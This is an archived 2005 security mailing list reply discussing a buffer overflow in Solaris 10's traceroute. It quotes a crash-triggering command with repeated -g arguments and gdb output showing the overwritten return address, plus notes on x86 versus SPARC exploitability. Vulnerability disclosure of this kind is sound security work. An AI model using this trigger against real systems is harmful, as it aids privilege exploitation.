lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <42BC6AE7.8070306@ngsec.com>
Date: Sat Jun 25 01:27:16 2005
From: fjserna at ngsec.com ("Fermín J. Serna")
Subject: Re: Solaris 10 /usr/sbin/traceroute
	vulnerabilities

Hello,

Please note his tests were on X86, SPARC needs double ret in order to 
successfuly xploit/segfault the vulnearable program due to register 
windows layout on stack.

Its like xfont (x-something, don't remember) issues on old solaris, 
exploitable (segfault) on x86 but not on SPARC because it does exit 
after the first ret, so there is no double ret chance.

Best regards,

David T. Moraski II wrote:
> On Fri, 24 Jun 2005, Przemyslaw Frasunek wrote:
> 
> 
>>/usr/sbin/traceroute from Solaris 10 is vulnerable to buffer overflow in
>>handling -g argument. After supplying 10 -g parameters, return address is
>>overwritten by IP address argument:
>>
>>atari:root:/home/venglin# /usr/sbin/traceroute -g 1 -g 2 -g 3 -g 4 -g 5 -g 6 -g
>>7 -g 8 -g 9 -g 10 127.0.0.1
>>traceroute: too many IPv4 gateways
>>traceroute: unknown IPv4 host 1
>>traceroute to 127.0.0.1 (127.0.0.1), 30 hops max, 88 byte packets
>>Segmentation fault (core dumped)
>>
>>atari:root:/home/venglin# gdb /usr/sbin/traceroute core
>>[...]
>>Core was generated by `/usr/sbin/traceroute -g 1 -g 2 -g 3 -g 4 -g 5 -g 6 -g 7
>>-g 8 -g 9 -g 10 127.0.0'.
>>Program terminated with signal 11, Segmentation fault.
>>[...]
>>#0  0x0100007f in ?? ()
>>
>>0x0100007f is of course 127.0.0.1.
> 
> 
> I ran the above command line on a Solaris 10 system, both as root and a
> regular user, and was unable to reproduce your results; traceroute did not
> segfault or produce a core file.  What was your patch level?
> 

-- 
Fem?n J. Serna @ NGSEC
http://www.ngsec.com

C\O?Donnell n? 46, 3?B
28009 Madrid
Spain
Telf.: +34 91 435 56 27
Fax.: +34 91 577 84 45

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ